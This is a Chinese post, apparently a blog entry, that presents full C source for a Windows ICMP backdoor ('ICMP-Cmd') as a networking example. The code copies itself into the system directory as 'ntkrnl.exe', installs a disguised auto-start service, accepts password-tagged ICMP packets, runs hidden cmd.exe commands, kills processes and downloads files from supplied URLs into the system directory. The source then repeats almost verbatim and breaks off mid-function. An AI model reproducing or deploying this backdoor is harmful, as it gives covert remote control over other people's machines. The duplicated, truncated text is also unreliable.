代码从网上所得,是一个通过ICMP 协议通讯的例子。 服务器端,注册成为服务,所支持的功能有限,只有list process,以及 stop process ,以及卸载服务器的段所注册的服务。 (可以从代码中看到原作者)
服务器端代码如下:
#include
<
winsock2.h
>
#include < stdio.h >
#include < urlmon.h >
#include < tlhelp32.h >
// #include "stdafx.h"
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")
#define ICMP_PASSWORD 1234
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 6500
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))
/* The IP header */
typedef struct iphdr {
unsigned int h_len: 4 ; // 4位首部长度
unsigned int version: 4 ; // IP版本号,4表示IPV4
unsigned char tos; // 8位服务类型TOS
unsigned short total_len; // 16位总长度(字节)
unsigned short ident; // 16位标识
unsigned short frag_and_flags; // 3位标志位
unsigned char ttl; // 8位生存时间 TTL
unsigned char proto; // 8位协议 (TCP, UDP 或其他)
unsigned short checksum; // 16位IP首部校验和
unsigned int sourceIP; // 32位源IP地址
unsigned int destIP; // 32位目的IP地址
}IpHeader;
// 定义ICMP首部
typedef struct _ihdr
{
BYTE i_type; // 8位类型
BYTE i_code; // 8位代码
USHORT i_cksum; // 16位校验和
USHORT i_id; // 识别号(一般用进程号作为识别号)
USHORT i_seq; // 报文序列号
ULONG timestamp; // 时间戳
}IcmpHeader;
char arg[ 256 ];
char buffer[ 2048 ] = { 0 }; // 管道输出的数据
void decode_resp( char * , int , struct sockaddr_in * ); // ICMP解包函数
void fill_icmp_data( char * icmp_data);
void pslist( void );
BOOL killps(DWORD id); // 杀进程函数
void send( void );
char * ICMP_DEST_IP;
USHORT checksum(USHORT * buffer, int size);
HANDLE hMutex;
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
void WINAPI ICMP_CmdStart(DWORD,LPTSTR * );
void WINAPI CmdControl(DWORD);
DWORD WINAPI CmdService(LPVOID);
void InstallCmdService( void );
void RemoveCmdService( void );
void usage( char * par);
int main( int argc, char * argv[])
{
#if 0
SERVICE_TABLE_ENTRY DispatchTable[] = {{ " ntkrnl " ,ICMP_CmdStart},{NULL,NULL}};
if (argc == 2 )
{
if ( ! stricmp(argv[ 1 ], " -install " ))
{
usage(argv[ 0 ]);
InstallCmdService();
}
else if ( ! stricmp(argv[ 1 ], " -remove " ))
{
usage(argv[ 0 ]);
RemoveCmdService();
}
else usage(argv[ 0 ]);
return 0 ;
}
else usage(argv[ 0 ]);
StartServiceCtrlDispatcher(DispatchTable);
#endif
CmdService( 0 );
return 0 ;
}
void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR * lpArgv)
{
HANDLE hThread;
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0 ;
ServiceStatus.dwWin32ExitCode = 0 ;
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
ServiceStatusHandle = RegisterServiceCtrlHandler( " ntkrnl " ,CmdControl);
if (ServiceStatusHandle == 0 )
{
OutputDebugString( " RegisterServiceCtrlHandler Error ! " );
return ;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdStart Error ! " );
return ;
}
hThread = CreateThread(NULL, 0 ,CmdService,NULL, 0 ,NULL);
if (hThread == NULL)
{
OutputDebugString( " CreateThread in CmdStart Error ! " );
}
return ;
}
void WINAPI CmdControl(DWORD dwCode)
{
switch (dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break ;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break ;
case SERVICE_CONTROL_STOP:
WaitForSingleObject(hMutex,INFINITE);
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0 ;
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdControl in Switch Error ! " );
}
ReleaseMutex(hMutex);
CloseHandle(hMutex);
return ;
case SERVICE_CONTROL_INTERROGATE:
break ;
default :
break ;
}
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdControl out Switch Error ! " );
}
return ;
}
DWORD WINAPI CmdService(LPVOID lpParam) // 这里是服务的主函数,把你的代码写在这里就可以成为服务
{
char * icmp_data;
int bread,datasize,retval;
SOCKET sockRaw = (SOCKET)NULL;
WSADATA wsaData;
struct sockaddr_in dest,from;
int fromlen = sizeof (from);
int timeout = 2000 ;
char * recvbuf;
if ((retval = WSAStartup(MAKEWORD( 2 , 1 ), & wsaData)) != 0 )
{
printf( " WSAStartup failed: %s " ,retval);
ExitProcess(STATUS_FAILED);
}
sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL, 0 ,WSA_FLAG_OVERLAPPED);
if (sockRaw == INVALID_SOCKET)
{
printf( " WSASocket() failed: %s " ,WSAGetLastError());
ExitProcess(STATUS_FAILED);
}
__try{
bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,( char * ) & timeout, sizeof (timeout));
if (bread == SOCKET_ERROR) __leave;
memset( & dest, 0 , sizeof (dest));
dest.sin_family = AF_INET;
datasize = 0 ;
datasize += sizeof (IcmpHeader);
icmp_data = ( char * )xmalloc(MAX_PACKET);
recvbuf = ( char * )xmalloc(MAX_PACKET);
if ( ! icmp_data) {
// fprintf(stderr,"HeapAlloc failed %d ",GetLastError());
__leave;
}
memset(icmp_data, 0 ,MAX_PACKET);
for (;;) {
int bwrote;
bwrote = sendto(sockRaw,icmp_data,datasize, 0 ,( struct sockaddr * ) & dest, sizeof (dest));
bread = recvfrom(sockRaw,recvbuf,MAX_PACKET, 0 ,( struct sockaddr * ) & from, & fromlen);
if (bread == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) continue ;
__leave;
}
decode_resp(recvbuf,bread, & from);
Sleep( 200 );
memset(recvbuf, 0 , sizeof (recvbuf));
}
}
__finally {
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0 ;
}
void InstallCmdService( void )
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
char * lpHostName;
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
SERVICE_STATUS InstallServiceStatus;
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath, " /ntkrnl.exe " );
lpHostName = NULL;
printf( " Transmitting File ... " );
hSearch = FindFirstFile(lpImagePath, & FileData);
if (hSearch == INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if (CopyFile(lpCurrentPath,lpImagePath,FALSE) == 0 )
{
dwErrorCode = GetLastError();
if (dwErrorCode == 5 )
{
printf( " Failure ... Access is Denied ! " );
}
else
{
printf( " Failure ! " );
}
return ;
}
else
{
printf( " Success ! " );
}
}
else
{
printf( " already Exists ! " );
FindClose(hSearch);
}
schSCManager = OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
{
printf( " Open Service Control Manager Database Failure ! " );
return ;
}
printf( " Creating Service .... " );
schService = CreateService(schSCManager, " ntkrnl " , " ntkrnl " ,SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE, " ntkrnl.exe " ,NULL,NULL,NULL,NULL,NULL);
if (schService == NULL)
{
dwErrorCode = GetLastError();
if (dwErrorCode != ERROR_SERVICE_EXISTS)
{
printf( " Failure ! " );
CloseServiceHandle(schSCManager);
return ;
}
else
{
printf( " already Exists ! " );
schService = OpenService(schSCManager, " ntkrnl " ,SERVICE_START);
if (schService == NULL)
{
printf( " Opening Service .... Failure ! " );
CloseServiceHandle(schSCManager);
return ;
}
}
}
else
{
printf( " Success ! " );
}
printf( " Starting Service .... " );
if (StartService(schService, 0 ,NULL) == 0 )
{
dwErrorCode = GetLastError();
if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)
{
printf( " already Running ! " );
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
}
else
{
printf( " Pending ... " );
}
while (QueryServiceStatus(schService, & InstallServiceStatus) != 0 )
{
if (InstallServiceStatus.dwCurrentState == SERVICE_START_PENDING)
{
Sleep( 100 );
}
else
{
break ;
}
}
if (InstallServiceStatus.dwCurrentState != SERVICE_RUNNING)
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
void RemoveCmdService( void )
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpImagePath[MAX_PATH];
char * lpHostName;
WIN32_FIND_DATA FileData;
SERVICE_STATUS RemoveServiceStatus;
HANDLE hSearch;
DWORD dwErrorCode;
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath, " /ntkrnl.exe " );
lpHostName = NULL;
schSCManager = OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
{
printf( " Opening SCM ......... " );
dwErrorCode = GetLastError();
if (dwErrorCode != 5 )
{
printf( " Failure ! " );
}
else
{
printf( " Failuer ... Access is Denied ! " );
}
return ;
}
schService = OpenService(schSCManager, " ntkrnl " ,SERVICE_ALL_ACCESS);
if (schService == NULL)
{
printf( " Opening Service ..... " );
dwErrorCode = GetLastError();
if (dwErrorCode == 1060 )
{
printf( " no Exists ! " );
}
else
{
printf( " Failure ! " );
}
CloseServiceHandle(schSCManager);
}
else
{
printf( " Stopping Service .... " );
if (QueryServiceStatus(schService, & RemoveServiceStatus) != 0 )
{
if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
{
printf( " already Stopped ! " );
}
else
{
printf( " Pending ... " );
if (ControlService(schService,SERVICE_CONTROL_STOP, & RemoveServiceStatus) != 0 )
{
while (RemoveServiceStatus.dwCurrentState == SERVICE_STOP_PENDING)
{
Sleep( 10 );
QueryServiceStatus(schService, & RemoveServiceStatus);
}
if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
{
printf( " Success ! " );
}
else
{
printf( " Failure ! " );
}
}
else
{
printf( " Failure ! " );
}
}
}
else
{
printf( " Query Failure ! " );
}
printf( " Removing Service .... " );
if (DeleteService(schService) == 0 )
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
printf( " Removing File ....... " );
Sleep( 1500 );
hSearch = FindFirstFile(lpImagePath, & FileData);
if (hSearch == INVALID_HANDLE_VALUE)
{
printf( " no Exists ! " );
}
else
{
if (DeleteFile(lpImagePath) == 0 )
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
FindClose(hSearch);
}
return ;
}
void decode_resp( char * buf, int bytes, struct sockaddr_in * from)
{
IpHeader * iphdr;
IcmpHeader * icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader * )buf;
iphdrlen = iphdr -> h_len * 4 ;
icmphdr = (IcmpHeader * )(buf + iphdrlen);
if (icmphdr -> i_seq == ICMP_PASSWORD) // 密码正确则输出数据段
{
ICMP_DEST_IP = inet_ntoa(from -> sin_addr); // 取得ICMP包的源地址
memcpy(arg,buf + iphdrlen + 12 , 256 );
if ( ! memcmp(arg, " pskill " , 6 ))
{
killps(atoi(strstr(arg, " " )));
memcpy(buffer, " Process is Killed! " , sizeof ( " Process is Killed! " ));
send();
}
else if ( ! memcmp(arg, " pslist " , 6 )){pslist();send();}
else if ( ! strcmp(arg, " remove " ))
{
RemoveCmdService();
memcpy(buffer, " Service Removed! " , sizeof ( " Service Removed! " ));
send();
return ;
}
************ http下载 *************
else if ( ! memcmp(arg, " http:// " , 7 ))
{
if ( char * FileName = strstr(arg, " - " ))
{
char url[ 200 ]; // 保存网址的数组
memset(url, 0 , 200 );
memcpy(url,arg, int (FileName - arg - 1 ));
char fname[MAX_PATH];
GetSystemDirectory(fname,MAX_PATH);
FileName ++ ;
strcat(fname, " / " );
strcat(fname,FileName);
* strstr(fname, " " ) = NULL;
HRESULT hRet = URLDownloadToFile( 0 ,url,fname, 0 , 0 );
memset(buffer, 0 , sizeof (buffer));
if (hRet == S_OK) memcpy(buffer, " Download OK! " , sizeof ( " Download OK " ));
else
memcpy(buffer, " Download Failure! " , sizeof ( " Download Failure! " ));
send();
return ;
}
}
// *******************************************
else {
SECURITY_ATTRIBUTES sa; // 创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hWrite;
sa.nLength = sizeof (SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if ( ! CreatePipe( & hRead, & hWrite, & sa, 0 ))
{
printf( " Error On CreatePipe() " );
return ;
}
STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof (STARTUPINFO);
GetStartupInfo( & si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
char cmdline[ 270 ];
GetSystemDirectory(cmdline,MAX_PATH + 1 );
strcat(cmdline, " /cmd.exe /c " );
strcat(cmdline,arg);
if ( ! CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL, & si, & pi))
{
printf( " Error on CreateProcess() " );
return ;
}
CloseHandle(hWrite);
DWORD bytesRead;
for (;;){
if ( ! ReadFile(hRead,buffer, 2048 , & bytesRead,NULL)) break ;
Sleep( 200 );
}
// printf("%s",buffer);
/
// 发送输出数据
send();
}
}
// else printf("Other ICMP Packets! ");
// printf(endl;
}
USHORT checksum(USHORT * buffer, int size)
{
unsigned long cksum = 0 ;
while (size > 1 )
{
cksum +=* buffer ++ ;
size -= sizeof (USHORT);
}
if (size ) {
cksum += * (UCHAR * )buffer;
}
cksum = (cksum >> 16 ) + (cksum & 0xffff );
cksum += (cksum >> 16 );
return (USHORT)( ~ cksum);
}
void fill_icmp_data( char * icmp_data)
{
IcmpHeader * icmp_hdr;
char * datapart;
icmp_hdr = (IcmpHeader * )icmp_data;
icmp_hdr -> i_type = 0 ;
icmp_hdr -> i_code = 0 ;
icmp_hdr -> i_id = (USHORT) GetCurrentProcessId();
icmp_hdr -> i_cksum = 0 ;
icmp_hdr -> i_seq = 4321 ;
icmp_hdr -> timestamp = GetTickCount(); // 设置时间戳
datapart = icmp_data + sizeof (IcmpHeader);
memcpy(datapart,buffer,strlen(buffer));
// for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i];
}
void usage( char * par)
{
printf( " =====Welcome to www.hackerxfiles.net====== " );
printf( " " );
printf( " ---[ ICMP-Cmd v1.0 beta, by gxisone ]--- " );
printf( " ---[ E-mail: gxisone@hotmail.com ]--- " );
printf( " ---[ 2003/8/15 ]--- " );
printf( " " );
printf( " Usage: %s -install (to install service) " ,par);
printf( " %s -remove (to remove service) " ,par);
printf( " " );
return ;
}
void send( void )
{
WSADATA wsaData;
SOCKET sockRaw = (SOCKET)NULL;
struct sockaddr_in dest;
int bread,datasize,retval,bwrote;
int timeout = 1000 ;
char * icmp_data;
if ((retval = WSAStartup(MAKEWORD( 2 , 1 ), & wsaData)) != 0 ) ExitProcess(STATUS_FAILED);
if ((sockRaw = WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL, 0 ,WSA_FLAG_OVERLAPPED))
== INVALID_SOCKET) ExitProcess(STATUS_FAILED);
__try
{
if ((bread = setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,( char * ) & timeout, sizeof (timeout))) == SOCKET_ERROR) __leave;
// 设置发送超时
memset( & dest, 0 , sizeof (dest));
dest.sin_family = AF_INET;
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
datasize = strlen(buffer);
datasize += sizeof (IcmpHeader);
icmp_data = ( char * )xmalloc(MAX_PACKET);
if ( ! icmp_data) __leave;
memset(icmp_data, 0 ,MAX_PACKET);
fill_icmp_data(icmp_data); // 填充ICMP报文
((IcmpHeader * )icmp_data) -> i_cksum = checksum((USHORT * )icmp_data, datasize); // 计算校验和
bwrote = sendto(sockRaw,icmp_data,datasize, 0 ,( struct sockaddr * ) & dest, sizeof (dest)); // 发送报文
if (bwrote == SOCKET_ERROR)
{
// if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out ");
// printf("sendto failed:"<<WSAGetLastError()<<endl;
__leave;
}
// printf("Send Packet to %s Success! "<<ICMP_DEST_IP<<endl;
}
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
memset(buffer, 0 , sizeof (buffer));
Sleep( 200 );
}
void pslist( void )
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = { 0 };
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0 );
if (hProcessSnap == (HANDLE) - 1 )
{
printf( " CreateToolhelp32Snapshot() failed:%d " ,GetLastError());
return ;
}
pe32.dwSize = sizeof (PROCESSENTRY32);
printf( " ProcessName ProcessID " );
if (Process32First(hProcessSnap, & pe32))
{
char a[ 5 ];
do
{
strcat(buffer,pe32.szExeFile);
strcat(buffer, " " );
itoa(pe32.th32ProcessID,a, 10 );
strcat(buffer,a);
strcat(buffer, " " );
// printf(" %-20s%d",pe32.szExeFile,pe32.th32ProcessID);
}
while (Process32Next(hProcessSnap, & pe32));
}
else
{
printf( " Process32Firstt() failed:%d " ,GetLastError());
}
CloseHandle (hProcessSnap);
return ;
}
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege) // 提示权限
{
TOKEN_PRIVILEGES tp;
LUID luid;
if ( ! LookupPrivilegeValue(NULL,lpszPrivilege, & luid))
{
printf( " LookupPrivilegeValue error:%d " , GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1 ;
tp.Privileges[ 0 ].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[ 0 ].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[ 0 ].Attributes = 0 ;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
hToken,
FALSE,
& tp,
sizeof (TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS)
{
printf( " AdjustTokenPrivileges failed: %u " , GetLastError() );
return FALSE;
}
return TRUE;
}
/// /
BOOL killps(DWORD id) // 杀进程函数
{
HANDLE hProcess = NULL,hProcessToken = NULL;
BOOL IsKilled = FALSE,bRet = FALSE;
__try
{
if ( ! OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS, & hProcessToken))
{
printf( " Open Current Process Token failed:%d " ,GetLastError());
__leave;
}
// printf(" Open Current Process Token ok!");
if ( ! SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
{
__leave;
}
printf( " SetPrivilege ok! " );
if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,id)) == NULL)
{
printf( " Open Process %d failed:%d " ,id,GetLastError());
__leave;
}
// printf(" Open Process %d ok!",id);
if ( ! TerminateProcess(hProcess, 1 ))
{
printf( " TerminateProcess failed:%d " ,GetLastError());
__leave;
}
IsKilled = TRUE;
}
__finally
{
if (hProcessToken != NULL) CloseHandle(hProcessToken);
if (hProcess != NULL) CloseHandle(hProcess);
}
return (IsKilled);
}
#include < stdio.h >
#include < urlmon.h >
#include < tlhelp32.h >
// #include "stdafx.h"
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")
#define ICMP_PASSWORD 1234
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 6500
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))
/* The IP header */
typedef struct iphdr {
unsigned int h_len: 4 ; // 4位首部长度
unsigned int version: 4 ; // IP版本号,4表示IPV4
unsigned char tos; // 8位服务类型TOS
unsigned short total_len; // 16位总长度(字节)
unsigned short ident; // 16位标识
unsigned short frag_and_flags; // 3位标志位
unsigned char ttl; // 8位生存时间 TTL
unsigned char proto; // 8位协议 (TCP, UDP 或其他)
unsigned short checksum; // 16位IP首部校验和
unsigned int sourceIP; // 32位源IP地址
unsigned int destIP; // 32位目的IP地址
}IpHeader;
// 定义ICMP首部
typedef struct _ihdr
{
BYTE i_type; // 8位类型
BYTE i_code; // 8位代码
USHORT i_cksum; // 16位校验和
USHORT i_id; // 识别号(一般用进程号作为识别号)
USHORT i_seq; // 报文序列号
ULONG timestamp; // 时间戳
}IcmpHeader;
char arg[ 256 ];
char buffer[ 2048 ] = { 0 }; // 管道输出的数据
void decode_resp( char * , int , struct sockaddr_in * ); // ICMP解包函数
void fill_icmp_data( char * icmp_data);
void pslist( void );
BOOL killps(DWORD id); // 杀进程函数
void send( void );
char * ICMP_DEST_IP;
USHORT checksum(USHORT * buffer, int size);
HANDLE hMutex;
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
void WINAPI ICMP_CmdStart(DWORD,LPTSTR * );
void WINAPI CmdControl(DWORD);
DWORD WINAPI CmdService(LPVOID);
void InstallCmdService( void );
void RemoveCmdService( void );
void usage( char * par);
int main( int argc, char * argv[])
{
#if 0
SERVICE_TABLE_ENTRY DispatchTable[] = {{ " ntkrnl " ,ICMP_CmdStart},{NULL,NULL}};
if (argc == 2 )
{
if ( ! stricmp(argv[ 1 ], " -install " ))
{
usage(argv[ 0 ]);
InstallCmdService();
}
else if ( ! stricmp(argv[ 1 ], " -remove " ))
{
usage(argv[ 0 ]);
RemoveCmdService();
}
else usage(argv[ 0 ]);
return 0 ;
}
else usage(argv[ 0 ]);
StartServiceCtrlDispatcher(DispatchTable);
#endif
CmdService( 0 );
return 0 ;
}
void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR * lpArgv)
{
HANDLE hThread;
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0 ;
ServiceStatus.dwWin32ExitCode = 0 ;
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
ServiceStatusHandle = RegisterServiceCtrlHandler( " ntkrnl " ,CmdControl);
if (ServiceStatusHandle == 0 )
{
OutputDebugString( " RegisterServiceCtrlHandler Error ! " );
return ;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdStart Error ! " );
return ;
}
hThread = CreateThread(NULL, 0 ,CmdService,NULL, 0 ,NULL);
if (hThread == NULL)
{
OutputDebugString( " CreateThread in CmdStart Error ! " );
}
return ;
}
void WINAPI CmdControl(DWORD dwCode)
{
switch (dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break ;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break ;
case SERVICE_CONTROL_STOP:
WaitForSingleObject(hMutex,INFINITE);
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0 ;
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdControl in Switch Error ! " );
}
ReleaseMutex(hMutex);
CloseHandle(hMutex);
return ;
case SERVICE_CONTROL_INTERROGATE:
break ;
default :
break ;
}
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdControl out Switch Error ! " );
}
return ;
}
DWORD WINAPI CmdService(LPVOID lpParam) // 这里是服务的主函数,把你的代码写在这里就可以成为服务
{
char * icmp_data;
int bread,datasize,retval;
SOCKET sockRaw = (SOCKET)NULL;
WSADATA wsaData;
struct sockaddr_in dest,from;
int fromlen = sizeof (from);
int timeout = 2000 ;
char * recvbuf;
if ((retval = WSAStartup(MAKEWORD( 2 , 1 ), & wsaData)) != 0 )
{
printf( " WSAStartup failed: %s " ,retval);
ExitProcess(STATUS_FAILED);
}
sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL, 0 ,WSA_FLAG_OVERLAPPED);
if (sockRaw == INVALID_SOCKET)
{
printf( " WSASocket() failed: %s " ,WSAGetLastError());
ExitProcess(STATUS_FAILED);
}
__try{
bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,( char * ) & timeout, sizeof (timeout));
if (bread == SOCKET_ERROR) __leave;
memset( & dest, 0 , sizeof (dest));
dest.sin_family = AF_INET;
datasize = 0 ;
datasize += sizeof (IcmpHeader);
icmp_data = ( char * )xmalloc(MAX_PACKET);
recvbuf = ( char * )xmalloc(MAX_PACKET);
if ( ! icmp_data) {
// fprintf(stderr,"HeapAlloc failed %d ",GetLastError());
__leave;
}
memset(icmp_data, 0 ,MAX_PACKET);
for (;;) {
int bwrote;
bwrote = sendto(sockRaw,icmp_data,datasize, 0 ,( struct sockaddr * ) & dest, sizeof (dest));
bread = recvfrom(sockRaw,recvbuf,MAX_PACKET, 0 ,( struct sockaddr * ) & from, & fromlen);
if (bread == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) continue ;
__leave;
}
decode_resp(recvbuf,bread, & from);
Sleep( 200 );
memset(recvbuf, 0 , sizeof (recvbuf));
}
}
__finally {
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0 ;
}
void InstallCmdService( void )
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
char * lpHostName;
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
SERVICE_STATUS InstallServiceStatus;
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath, " /ntkrnl.exe " );
lpHostName = NULL;
printf( " Transmitting File ... " );
hSearch = FindFirstFile(lpImagePath, & FileData);
if (hSearch == INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if (CopyFile(lpCurrentPath,lpImagePath,FALSE) == 0 )
{
dwErrorCode = GetLastError();
if (dwErrorCode == 5 )
{
printf( " Failure ... Access is Denied ! " );
}
else
{
printf( " Failure ! " );
}
return ;
}
else
{
printf( " Success ! " );
}
}
else
{
printf( " already Exists ! " );
FindClose(hSearch);
}
schSCManager = OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
{
printf( " Open Service Control Manager Database Failure ! " );
return ;
}
printf( " Creating Service .... " );
schService = CreateService(schSCManager, " ntkrnl " , " ntkrnl " ,SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE, " ntkrnl.exe " ,NULL,NULL,NULL,NULL,NULL);
if (schService == NULL)
{
dwErrorCode = GetLastError();
if (dwErrorCode != ERROR_SERVICE_EXISTS)
{
printf( " Failure ! " );
CloseServiceHandle(schSCManager);
return ;
}
else
{
printf( " already Exists ! " );
schService = OpenService(schSCManager, " ntkrnl " ,SERVICE_START);
if (schService == NULL)
{
printf( " Opening Service .... Failure ! " );
CloseServiceHandle(schSCManager);
return ;
}
}
}
else
{
printf( " Success ! " );
}
printf( " Starting Service .... " );
if (StartService(schService, 0 ,NULL) == 0 )
{
dwErrorCode = GetLastError();
if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)
{
printf( " already Running ! " );
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
}
else
{
printf( " Pending ... " );
}
while (QueryServiceStatus(schService, & InstallServiceStatus) != 0 )
{
if (InstallServiceStatus.dwCurrentState == SERVICE_START_PENDING)
{
Sleep( 100 );
}
else
{
break ;
}
}
if (InstallServiceStatus.dwCurrentState != SERVICE_RUNNING)
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
void RemoveCmdService( void )
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpImagePath[MAX_PATH];
char * lpHostName;
WIN32_FIND_DATA FileData;
SERVICE_STATUS RemoveServiceStatus;
HANDLE hSearch;
DWORD dwErrorCode;
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath, " /ntkrnl.exe " );
lpHostName = NULL;
schSCManager = OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
{
printf( " Opening SCM ......... " );
dwErrorCode = GetLastError();
if (dwErrorCode != 5 )
